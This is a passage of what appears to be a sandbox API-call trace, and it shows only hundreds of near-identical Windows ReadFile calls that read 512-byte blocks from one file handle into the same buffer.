lpOverlapped=0x0) returned 1 [0134.570] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.570] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.570] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, 
lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.570] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.570] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.570] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.570] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.570] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.571] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.571] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.571] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.571] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: 
lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.571] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.571] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.571] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.571] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.571] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.571] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.571] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.571] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.571] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, 
lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.572] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.572] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.572] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.572] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.572] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.572] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.572] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.572] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.572] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.572] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.572] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.572] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.572] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.573] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.573] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.573] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.573] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.573] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.573] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.573] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.573] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.573] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.573] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.573] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.573] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.573] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.573] ReadFile (in: hFile=0x58, 
lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.574] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.574] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.574] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.574] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.574] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.574] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.574] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.574] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.574] ReadFile 
(in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.574] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.574] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.574] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.664] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.664] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.664] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.665] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.665] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 
[0134.665] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.665] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.665] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.665] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.665] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.665] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.665] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.665] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.665] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, 
lpOverlapped=0x0) returned 1 [0134.665] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.666] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.666] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.666] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.666] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.666] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.666] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.666] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.666] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, 
lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.666] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.666] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.666] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.666] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.666] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.667] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.667] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.667] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.667] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: 
lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.667] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.667] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.667] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.667] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.667] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.667] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.667] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.667] ReadFile 